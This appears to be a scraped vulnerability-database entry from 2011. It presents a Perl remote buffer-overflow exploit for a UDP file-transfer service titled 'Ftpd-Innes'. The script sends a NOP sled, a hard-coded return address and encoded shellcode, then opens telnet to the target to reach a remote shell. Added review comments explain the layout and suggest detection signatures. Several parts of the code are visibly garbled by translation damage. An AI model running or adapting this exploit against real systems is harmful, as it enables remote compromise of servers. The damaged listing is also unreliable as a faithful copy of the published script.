Ftpd-Innes remote overflow exploit - vulnerability warning - the black bar safety net

2011-10-29T00:00:00
ID MYHACK58:62201132182
Type myhack58
Reporter 佚名
Modified 2011-10-29T00:00:00

Description

!/ usr/bin/perl-w

use IO::Socket;

# Require two command-line arguments (target host, then port). The test is on
# the truthiness of $ARGV[1]; when it fails, print the usage line and exit.
if(! ($ARGV[1]))

{

print "Usage: ./ Ftpd-innes.pl target host port\n\n";

exit;

}

# Create a UDP socket bound to the host and port given on the command line and
# die if the constructor fails. UDP is connectionless, so a successful return
# here does not show that any service is listening.
# NOTE(review): the page title says "Ftpd", but the transport is UDP and the
# datagram assembled further down starts with \x00\x01, which is the TFTP
# read-request opcode -- presumably the affected service is a TFTP server;
# confirm against the vendor advisory before writing detections for it.
$victim = IO::Socket::INET->new(Proto=>"udp",

PeerAddr=>$ARGV[0],

PeerPort=>$ARGV[1])

or die "Cannot connect to $ARGV[0] sulla porta $ARGV[1]";

# Fixed-size pieces of the datagram: three runs of 0x90 bytes, an 8-byte $asm
# string and a 4-byte $eip value. The names suggest filler plus a saved
# return-address overwrite, i.e. a stack-overflow layout (inferred from the
# names and the page title, not shown by the code itself). The 4-byte value is
# hard-coded, so it presumably matches only one build of the target.
# Detection note: long runs of 0x90 do not occur in legitimate request fields
# and are a cheap signature for this class of datagram.
my $nop0="\x90"x20;

my $asm="\x7c\xc5\x66\x07\x12\x02\x50\xc3";

my $nop1="\x90"x60;

my $nop2="\x90"x 10;

my $eip="\x42\xfd\x60\x40";

# NOTE(review): $eip is declared a second time with text that looks like
# extraction/translation damage rather than Perl the author wrote, so this
# listing should not be treated as a faithful copy of the published script.
my $eip="A"and x5;

# Opaque payload bytes, concatenated from the string literals below. The
# leading bytes look like an fnstenv-based XOR decoder stub of the kind payload
# generators emit (TODO confirm), so the remainder is encoded and not readable
# as instructions without decoding.
# NOTE(review): several escapes were damaged in transcription ("\69" where a
# two-digit \xNN is expected, and "\the XE3"), so these bytes do not match the
# original sample. Use the listing to recognise the pattern, not as a
# reference copy for hashing or byte-exact signatures.
my $shellcode =

"\x29\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xed".

"\x7d\x09\xbf\x83\xeb\xfc\xe2\xf4\x11\x17\xe2\xf2\x05\x84\xf6\x40".

"\x12\x1d\x82\xd3\xc9\x59\x82\xfa\xd1\xf6\x75\xba\x95\x7c\xe6\x34".

"\xa2\x65\x82\xe0\xcd\x7c\xe2\xf6\x66\x49\x82\xbe\x03\x4c\xc9\x26".

"\x41\xf9\xc9\xcb\xea\xbc\xc3\xb2\xec\xbf\xe2\x4b\xd6\x29\x2d\x97".

"\x98\x98\x82\xe0\xc9\x7c\xe2\xd9\x66\x71\x42\x34\xb2\x61\x08\x54".

"\xee\x51\x82\x36\x81\x59\x15\xde\x2e\x4c\xd2\xdb\x66\x3e\x39\x34".

"\xad\x71\x82\xcf\xf1\xd0\x82\xff\xe5\x23\x61\x31\xa3\x73\xe5\xef".

"\x12\xab\x6f\xec\x8b\x15\x3a\x8d\x85\x0a\x7a\x8d\xb2\x29\xf6\x6f".

"\x85\xb6\xe4\x43\xd6\x2d\xf6\69\xb2\xf4\xec\xd9\x6c\x90\x01\xbd".

"\xb8\x17\x0b\x40\x3d\x15\xd0\xb6\x18\xd0\x5e\x40\x3b\x2e\x5a\xec".

"\xbe\x2e\x4a\xec\xae\x2e\xf6\x6f\x8b\x15\x18\the XE3\x8b\x2e\x80\x5e".

"\x78\x15\xad\xa5\x9d\xba\x5e\x40\x3b\x17\x19\xee\xb8\x82\xd9\xd7".

"\x49\xd0\x27\x56\xba\x82\xdf\xec\xb8\x82\xd9\xd7\x08\x34\x8f\xf6".

"\xba\x82\xdf\xef\xb9\x29\x5c\x40\x3d\xee\x61\x58\x94\xbb\x70\xe8".

"\x12\xab\x5c\x40\x3d\x1b\x63\xdb\x8b\x15\x6a\xd2\x64\x98\x63\xef".

"\xb4\x54\xc5\x36\x0a\x17\x4d\x36\x0f\x4c\xc9\x4c\x47\x83\x4b\x92".

"\x13\x3f\x25\x2c\x60\x07\x31\x14\x46\xd6\x61\xcd\x13\xce\x1f\x40".

"\x98\x39\xf6\69\xb6\x2a\x5b\xee\xbc\x2c\x63\xbe\xbc\x2c\x5c\xee".

"\x12\xad\x61\x12\x34\x78\xc7\xec\x12\xab\x63\x40\x12\x4a\xf6\x6f".

"\x66\x2a\xf5\x3c\x29\x19\xf6\69\xbf\x82\xd9\xd7\x1d\xf7\x0d\xe0".

"\xbe\x82\xdf\x40\x3d\x7d\x09\xbf";

# Assemble the datagram in order: a \x00\x01 prefix, filler, $asm, filler, the
# payload, filler, $eip, and a short NUL-delimited trailer (the trailer also
# carries the damaged "\69" escapes).
$exploit = "\x00\x01" . $nop0 .$ asm.$ nop1. $shellcode. $nop2 .$ eip. "\x00\x7e\x56\x70\x60\x70\x45\69\69\x00";

# Write the buffer to the UDP socket; the return value of print is not checked.
print $victim $exploit;

print "+ Malicious request sent ...\n";

sleep(2);

print "Done.\ n";

close($victim);

# Follow-up step: after a pause the script shells out to telnet against the
# same host. The port digits are space-separated in this transcription
# (presumably 4444 -- confirm against the original).
# Detection note: a new listener on the server host, or an inbound TCP session
# to it shortly after an oversized request to the UDP service, is the
# observable to alert on.
$host = $ARGV[0];

print "+ connect to 4 4 4 4 The port of $host ...\n";

sleep(3);

# NOTE(review): $host is taken straight from @ARGV and interpolated into a
# shell command line, so shell metacharacters in the argument are interpreted
# by the shell on the machine running this script; list-form system() avoids
# shell parsing.
system("telnet $host 4 4 4 4");

exit;